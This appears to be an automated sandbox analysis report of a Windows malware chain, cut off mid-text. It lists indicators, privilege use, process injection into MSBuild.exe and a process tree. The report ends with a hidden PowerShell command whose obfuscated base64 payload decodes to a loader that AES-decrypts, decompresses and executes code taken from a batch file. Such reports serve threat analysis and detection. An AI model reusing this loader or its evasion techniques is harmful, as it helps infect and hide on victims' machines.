description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 68ab528098.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 68ab528098.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5676 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 64 IoCs
pid Process 3912 taskkill.exe 4180 taskkill.exe 2956 taskkill.exe 6132 taskkill.exe 6744 taskkill.exe 2800 taskkill.exe 4844 taskkill.exe 4772 taskkill.exe 4672 taskkill.exe 5312 taskkill.exe 6724 taskkill.exe 2392 taskkill.exe 6332 taskkill.exe 6324 taskkill.exe 6412 taskkill.exe 3052 taskkill.exe 1988 taskkill.exe 4388 taskkill.exe 5644 taskkill.exe 3524 taskkill.exe 2256 taskkill.exe 456 taskkill.exe 2348 taskkill.exe 3004 taskkill.exe 1560 taskkill.exe 3224 taskkill.exe 3264 taskkill.exe 6532 taskkill.exe 2672 taskkill.exe 3936 taskkill.exe 2684 taskkill.exe 2628 taskkill.exe 6456 taskkill.exe 4032 taskkill.exe 2712 taskkill.exe 6504 taskkill.exe 2908 taskkill.exe 2600 taskkill.exe 6848 taskkill.exe 5660 taskkill.exe 7004 taskkill.exe 4220 taskkill.exe 436 taskkill.exe 864 taskkill.exe 6220 taskkill.exe 6116 taskkill.exe 7084 taskkill.exe 6964 taskkill.exe 6684 taskkill.exe 1020 taskkill.exe 4292 taskkill.exe 5116 taskkill.exe 2684 taskkill.exe 468 taskkill.exe 4780 taskkill.exe 3328 taskkill.exe 5696 taskkill.exe 6396 taskkill.exe 5448 taskkill.exe 5356 taskkill.exe 2928 taskkill.exe 2248 taskkill.exe 1420 taskkill.exe 4468 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880574374360127" chrome.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3218366390-1258052702-4267193707-1000\{6759DD68-F9A1-4618-8D74-2DE62432B699} chrome.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3218366390-1258052702-4267193707-1000\{58857EAD-B3C2-449F-B981-2ADE1CF4AEB7} msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2447497384.txt\ cmd.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3112 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3108 random.exe 3108 random.exe 5028 rapes.exe 5028 rapes.exe 3456 MSBuild.exe 3456 MSBuild.exe 3456 MSBuild.exe 3456 MSBuild.exe 5036 MSBuild.exe 5036 MSBuild.exe 5036 MSBuild.exe 5036 MSBuild.exe 1168 MSBuild.exe 1168 MSBuild.exe 1168 MSBuild.exe 1168 MSBuild.exe 3328 MSBuild.exe 3328 MSBuild.exe 3328 MSBuild.exe 3328 MSBuild.exe 2344 rapes.exe 2344 rapes.exe 3112 powershell.exe 3112 powershell.exe 5036 powershell.exe 5036 powershell.exe 5036 powershell.exe 4084 captcha.exe 4084 captcha.exe 4084 captcha.exe 4084 captcha.exe 4084 captcha.exe 4084 captcha.exe 3668 powershell.exe 3668 powershell.exe 3668 powershell.exe 2316 275ebaba42.exe 2316 275ebaba42.exe 2316 275ebaba42.exe 2316 275ebaba42.exe 2316 275ebaba42.exe 2316 275ebaba42.exe 4072 powershell.exe 4072 powershell.exe 4072 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 4008 ac5ed4bbfd.exe 4008 ac5ed4bbfd.exe 4008 43b13e599f.exe 4008 43b13e599f.exe 4716 chrome.exe 4716 chrome.exe 5340 7381290483.exe 5340 7381290483.exe 5340 7381290483.exe 5340 7381290483.exe 5340 7381290483.exe 5340 7381290483.exe 5744 68ab528098.exe 5744 68ab528098.exe 4928 IeGkDOqzXwi9.exe 4928 IeGkDOqzXwi9.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 664 Process not Found 664 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1448 p3hx1_003.exe 1448 p3hx1_003.exe 1448 p3hx1_003.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3112 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 2904 tasklist.exe Token: SeDebugPrivilege 4164 tasklist.exe Token: SeDebugPrivilege 4984 tasklist.exe Token: SeDebugPrivilege 1716 tasklist.exe Token: SeDebugPrivilege 3668 powershell.exe Token: SeDebugPrivilege 2592 tasklist.exe Token: SeDebugPrivilege 4652 tasklist.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4504 tasklist.exe Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe Token: 34 4072 powershell.exe Token: 35 4072 powershell.exe Token: 36 4072 powershell.exe Token: SeDebugPrivilege 4048 tasklist.exe Token: SeDebugPrivilege 2300 tasklist.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeDebugPrivilege 5024 tasklist.exe Token: SeDebugPrivilege 1988 tasklist.exe Token: SeDebugPrivilege 3876 tasklist.exe Token: SeDebugPrivilege 4524 tasklist.exe Token: SeDebugPrivilege 3556 taskkill.exe Token: SeDebugPrivilege 2684 taskkill.exe Token: SeDebugPrivilege 1676 tasklist.exe Token: SeDebugPrivilege 436 taskkill.exe Token: SeDebugPrivilege 1072 tasklist.exe Token: SeDebugPrivilege 4980 taskkill.exe Token: SeDebugPrivilege 3160 tasklist.exe Token: SeDebugPrivilege 3052 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeDebugPrivilege 456 taskkill.exe Token: SeDebugPrivilege 468 taskkill.exe Token: SeDebugPrivilege 2248 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe Token: SeDebugPrivilege 2348 taskkill.exe Token: SeDebugPrivilege 1420 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 4980 taskkill.exe Token: SeDebugPrivilege 2916 taskkill.exe Token: SeDebugPrivilege 3004 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 3936 taskkill.exe Token: SeDebugPrivilege 4524 taskkill.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 3912 taskkill.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 3108 random.exe 4716 chrome.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 808 msedge.exe 5552 b57d7fa1b5.exe 808 msedge.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5892 firefox.exe 5552 b57d7fa1b5.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5552 b57d7fa1b5.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5552 b57d7fa1b5.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5892 firefox.exe 5552 b57d7fa1b5.exe 5552 b57d7fa1b5.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5892 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3108 wrote to memory of 5028 3108 random.exe 89 PID 3108 wrote to memory of 5028 3108 random.exe 89 PID 3108 wrote to memory of 5028 3108 random.exe 89 PID 5028 wrote to memory of 4620 5028 rapes.exe 95 PID 5028 wrote to memory of 4620 5028 rapes.exe 95 PID 4620 wrote to memory of 4368 4620 XOPPRUc.exe 96 PID 4620 wrote to memory of 4368 4620 XOPPRUc.exe 96 PID 4620 wrote to memory of 4368 4620 XOPPRUc.exe 96 PID 4620 wrote to memory of 1008 4620 XOPPRUc.exe 97 PID 4620 wrote to memory of 1008 4620 XOPPRUc.exe 97 PID 4620 wrote to memory of 1008 4620 XOPPRUc.exe 97 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 4620 wrote to memory of 3456 4620 XOPPRUc.exe 98 PID 5028 wrote to memory of 3056 5028 rapes.exe 101 PID 5028 wrote to memory of 3056 5028 rapes.exe 101 PID 3056 wrote to memory of 3540 3056 h8NlU62.exe 102 PID 3056 wrote to memory of 3540 3056 h8NlU62.exe 102 PID 3056 wrote to memory of 3540 3056 h8NlU62.exe 102 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 3056 wrote to memory of 5036 3056 h8NlU62.exe 103 PID 5028 wrote to memory of 4504 5028 rapes.exe 104 PID 5028 wrote to memory of 4504 5028 rapes.exe 104 PID 4504 wrote to memory of 2800 4504 qWR3lUj.exe 105 PID 4504 wrote to memory of 2800 4504 qWR3lUj.exe 105 PID 4504 wrote to memory of 2800 4504 qWR3lUj.exe 105 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 4504 wrote to memory of 1168 4504 qWR3lUj.exe 106 PID 5028 wrote to memory of 4512 5028 rapes.exe 107 PID 5028 wrote to memory of 4512 5028 rapes.exe 107 PID 4512 wrote to memory of 4416 4512 YGYZCmt.exe 108 PID 4512 wrote to memory of 4416 4512 YGYZCmt.exe 108 PID 4512 wrote to memory of 4416 4512 YGYZCmt.exe 108 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 4512 wrote to memory of 3328 4512 YGYZCmt.exe 109 PID 5028 wrote to memory of 4980 5028 rapes.exe 113 PID 5028 wrote to memory of 4980 5028 rapes.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4368
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1008
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:3540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2800
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4416
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"3⤵
- System Location Discovery: System Language Discovery
PID:4980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:2972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeG